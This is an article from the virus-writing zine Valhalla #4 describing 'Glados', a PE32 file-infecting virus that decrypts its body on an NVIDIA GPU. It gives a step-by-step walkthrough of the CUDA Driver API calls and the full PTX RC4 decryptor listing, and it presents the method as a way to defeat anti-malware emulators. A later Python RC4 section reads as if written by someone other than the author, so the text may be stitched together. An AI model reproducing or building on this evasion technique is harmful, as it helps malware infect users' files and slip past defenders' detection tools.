Using CUDA PTX for decryption

hh86
Valhalla #4
November 2013

About Glados

It is my first virus to use an NVIDIA CUDA-capable GPU for decryption. It is a direct-action file infector of PE32 exe files in the current directory, overwriting their reloc data if it is present in the large section and big enough to hold the virus body. The infected files become droppers. It is the world's first virus to decrypt code using Parallel Thread Execution code.

What is it?

Our journey begins by understanding what CUDA is. Here is a good explanation from Wikipedia: "CUDA (aka Compute Unified Device Architecture) is a parallel computing platform and programming model created by NVIDIA and implemented by the graphics processing units (GPUs) that they produce. CUDA gives program developers direct access to the virtual instruction set and memory of the parallel computational elements in CUDA GPUs".

CUDA introduces CUDA C/C++ (and the possibility to extend others such as Visual C++) as the primary high-level language, and an assembly-like intermediate language that sits between the high-level language and the machine code that is executed on the GPU. The assembly language is known as Parallel Thread Execution, or PTX for short. PTX allows programmers to improve the performance of critical algorithms while still writing code that is highly portable.

Back to basics

Let's think about the source code of a physics program that makes its calculations using a CUDA GPU. The function that makes the calculation is executed on the GPU. It is compiled from CUDA C source code, which also contains the code to initialize the application and prepare the GPU to run the function. The function is compiled to PTX, and the PTX code is then compiled and re-optimised for better performance on the chosen target architecture.

Inside the compiled program, the compiled PTX is stored as a "cubin" file (actually, it is an embedded ELF file). When the program starts, it passes the cubin through the CUDA runtime library or directly to the CUDA driver. Either way, the cubin file is then translated again to run on the specific instruction set of the GPU (yes, GPUs have various instruction sets that can run on their multiple cores).

Viruses and GPUs

The world's first virus that used the GPGPU for decryption was W32.OGLe by roy g biv. In his analysis, Peter Ferrie describes the GPU as presenting: "unimaginable challenges for anti-malware emulators, especially given that there are two major execution environments which have quite different behaviours, and there is no easy way to determine which one is intended to be used".

CUDA GPUs introduce a special challenge. As I described, those GPUs can run code for different targets, and I haven't yet mentioned that they can be made to run thousands of threads on thousands of cores, concurrently! That's very scary, for them. ;)

I first learned about PTX code when I was doing research for my first virus ever. It took a long time before I was finally able to purchase an NVIDIA graphics card. I decided to try it myself and wrote a simple POC to decrypt the virus using CUDA-capable GPUs and PTX.

How can we do that

We use the Driver API instead of the CUDA Runtime API, since there is a chance that the host system does not have the runtime library installed, while the Driver API comes with the driver itself. First we call the cuInit() API to initialize the driver. The next task is finding a CUDA-capable device (the system may have multiple graphics cards and they may work concurrently). We use the cuDeviceGetCount() API to get the number of devices that support CUDA.

If a device is found and matches the required configuration, the next step is to create a context (CUcontext) on the device. We call the cuCtxCreate() API to do that; here I use the CU_CTX_SCHED_BLOCKING_SYNC flag so that the host thread blocks while waiting for the GPU to finish.

Now we load the module (CUmodule), which makes the driver JIT-compile it. Just use cuModuleLoadDataEx() and then cuModuleGetFunction() to get a handle (CUfunction) to our kernel. The module here is the PTX source code of a function (or of numerous functions).

The device cannot work with host memory directly, so we need to allocate device memory using cuMemAlloc(). Then we copy the encrypted virus code (and in this case, the keys too) to it using cuMemcpyHtoD(). Then we can launch the decryptor code on the device using cuLaunchKernel().

For a code example of the whole process, take a look at the Glados source code.

PTX decryptor

It is an RC4 algorithm that uses 128-bit keys. I ported it to CUDA PTX from my UNIT00 virus, which was written in x86 assembler. It looks like this:

        mov.s32         r1, 0;

fill_states:
        mov.s32         r2, s[r1];
        st.local.s8     [r2], r1;
        add.s32         r1, r1, 1;
        setp.eq.s32     p, r1, 256;
@!p     bra             fill_states;
        ld.param.s32    r9, [b];
        mov.s32         r3, 0;
        mov.s32         r1, 0;

do_permutation:
        mov.s32         r5, s[r1];
        ld.local.s8     r4, [r5];
        mov.s32         r6, r4;
        mov.s32         r7, r5;
        add.s32         r3, r3, r4;
        rem.s32         r4, r1, 16;
        add.s32         r5, r9, r4;
        ld.global.s8    r4, [r5];
        add.s32         r3, r3, r4;
        and.b32         r3, r3, 0xff;
        mov.s32         r5, s[r3];
        ld.local.s8     r4, [r5];
        st.local.s8     [r7], r4;
        st.local.s8     [r5], r6;
        add.s32         r1, r1, 1;
        setp.eq.s32     p, r1, 256;
@!p     bra             do_permutation;
        mov.s32         r1, 0;
        mov.s32         r3, 0;
        mov.s32         r8, 0;

decrypt:
        add.s32         r1, r1, 1;
        and.b32         r1, r1, 0xff;
        mov.s32         r5, s[r1];
        ld.local.s8     r4, [r5];
        mov.s32         r6, r4;
        mov.s32         r7, r5;
        add.s32         r3, r3, r4;
        and.b32         r3, r3, 0xff;
        mov.s32         r5, s[r3];
        ld.local.s8     r4, [r5];
        st.local.s8     [r7], r4;
        st.local.s8     [r5], r6;
        add.s32         r6, r6, r4;
        and.b32         r6, r6, 0xff;
        mov.s32         r5, s[r6];
        ld.local.s8     r4, [r5];
        ld.global.s8    r2, [r9+16];
        xor.b32         r4, r4, r2;
        st.global.b8    [r9+16], r4;
        add.s32         r9, r9, 1;
        add.s32         r8, r8, 1;
        setp.eq.s32     p, r8, 0000;    //virus size
@!p     bra             decrypt;
 

Interpretation of the code should be pretty straightforward for people familiar with the x86 instruction set, since I didn't make use of any special instructions, with very few exceptions: "rem" returns the remainder, "ld" is like "lods" and "st" is like "stos". I use "mov" here to set some values to zero since it takes fewer operands than "xor" (in CUDA PTX it is dst, src1, src2), but "mov" can also be used like "lea" from x86, which is how the code gets the address of each state byte. The code is not optimised: the algorithm can use fewer instructions, and the "local" and "global" qualifiers can be dropped, in which case the accesses become generic and the GPU checks in which range the memory pointer falls (but that may make the process slower).
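
For readers who want to follow the three loops without reading PTX, here is a minimal sketch of textbook RC4 in Python, with comments naming the matching labels of the listing. It is a reference for the algorithm only, not a translation of the Glados source. The function names are mine, and the buffer layout used by rc4_in_place() (key in the first 16 bytes, data right after it) is an assumption I read off the "rem ..., 16" and "[r9+16]" operands in the listing.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: XOR data with the keystream derived from key."""
    # fill_states: S[i] = i for all 256 entries
    s = list(range(256))

    # do_permutation: key scheduling (the listing fixes the key length at 16)
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]

    # decrypt: generate one keystream byte per data byte and XOR it in
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_in_place(buf: bytearray, key_len: int = 16) -> None:
    """Hypothetical helper: key in buf[:key_len], data after it (assumed layout)."""
    buf[key_len:] = rc4(bytes(buf[:key_len]), bytes(buf[key_len:]))


# Well-known RC4 test vector: key "Key", plaintext "Plaintext"
print(rc4(b"Key", b"Plaintext").hex())  # bbf316e8d940af0ad3
```

Since RC4 is a plain XOR with the keystream, running the same function twice with the same key gives back the original bytes, which is why the listing needs only one routine.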

Outro

The weakness lies in the PTX code itself, because it can be retrieved and understood with minor effort, but we'll soon change that by introducing the GPU machine code within the CPU machine code itself.

hh86
1 November 2013